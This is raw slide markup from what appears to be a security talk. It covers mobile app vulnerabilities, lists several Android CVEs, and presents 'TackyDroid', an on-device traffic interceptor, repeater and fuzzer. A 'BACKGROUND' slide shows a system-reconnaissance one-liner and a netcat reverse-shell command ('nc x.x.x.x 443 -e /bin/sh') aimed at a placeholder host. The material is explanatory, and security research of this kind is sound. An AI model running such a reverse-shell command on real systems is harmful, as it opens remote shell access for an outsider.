                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Allows an adversary to execute functionality they should not be entitled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>M9: Improper session handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Session token is unintentionally shared</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>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l33t vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="291" name="Shape 291"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="816000" x="2367175"/>
            <a:ext cy="4409650" cx="4409650"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Shape 296"/>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l33t vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 297"/>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0" marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRP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Most mobile app vulnerabilities nowadays are related to information leakage</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Preference files</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SQLite database files</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Log functions blah</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MITM attack</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and more ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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Most of them only exists when a phone is lost or rooted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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When did storing data inside a sandbox become a crime?? Just looks at Google’s app...</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>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l33t vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>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0" marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Mozilla Firefox for Android CVE-2014-1527 Security Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Successfully exploiting this issue may allow an attacker to redirect users to an attacker-controlled site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Google Chrome for Android CVE-2014-1710 Memory Corruption Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="1" marR="0" indent="-381000" marL="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Shape 308"/>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l33t vulns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="805325" x="978100"/>
            <a:ext cy="4372138" cx="6565701"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Shape 314"/>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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>Tackydroids guts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Shape 315"/>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0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Enough bullshit, let’s get into TackyDroid</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Shape 320"/>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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>Tackydroids guts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 321"/>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No root is needed</a:t>
            </a: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Features, features, features !</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UI design</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Interceptor</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Repeater</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Dumb fuzzer</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Automatic fuzzer (Future work)</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>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No root privilege is needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>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274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="40000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>BUT you need root</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>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to intercept traffics from apps other than the browser</a:t>
            </a:r>
          </a:p>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Sorry we decided to use IPTables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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Shape 111"/>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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>BACKGROUND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>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121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>$ whoami ; id ; uname -r ; cat /etc/*-release</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>$ nc x.x.x.x 443 -e /bin/sh</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Shape 332"/>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UI design - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>Initial problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Shape 333"/>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274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2400" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Most java libraries are gimped on Android</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2400" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>How do we maintain the user experience without having to switch between activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2400" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Screen space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-274320" marL="274320">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="2400" lang="en-US" i="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Shitty mobile keyboards</a:t>
            </a:r>
          </a:p>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Really shitty mobile keyboards</a:t>
            </a:r>
          </a:p>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Holy f@#k screen space</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338"/>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UI design - </a:t>
            </a:r>
          </a:p>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Thank you F@cebook!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Shape 339"/>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Remember the small overlayed bubble in your Facebook app ?</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F@#k u messenger app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Sits over applications, no need to switch between activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Can easily be moved around</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Opens with a single click</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Translucent</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>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UI design - </a:t>
            </a:r>
          </a:p>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Overlayyyyedddd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="509900" x="1085600"/>
            <a:ext cy="3922200" cx="6972800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="509900" x="1085600"/>
            <a:ext cy="3922200" cx="6972800"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Shape 351"/>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UI design - </a:t>
            </a:r>
          </a:p>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Overlayyyyedddd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="352" name="Shape 352"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="477675" x="1105150"/>
            <a:ext cy="3900199" cx="6933699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="353" name="Shape 353"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="477675" x="1105150"/>
            <a:ext cy="3900199" cx="6933688"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Shape 358"/>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Interceptor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 359"/>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Power to intercept traffics on the fly</a:t>
            </a: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Request modification</a:t>
            </a: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Not to mention Cartman beefs up when there’s a incoming request</a:t>
            </a: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lv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lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="2437550" x="2066925"/>
            <a:ext cy="2828925" cx="5010150"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 365"/>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Interceptor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="582775" x="707575"/>
            <a:ext cy="4347474" cx="7728849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="367" name="Shape 367"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="582775" x="707575"/>
            <a:ext cy="4347477" cx="7728849"/>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1" name="Shape 371"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372"/>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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="5400" lang="en-US" i="0">
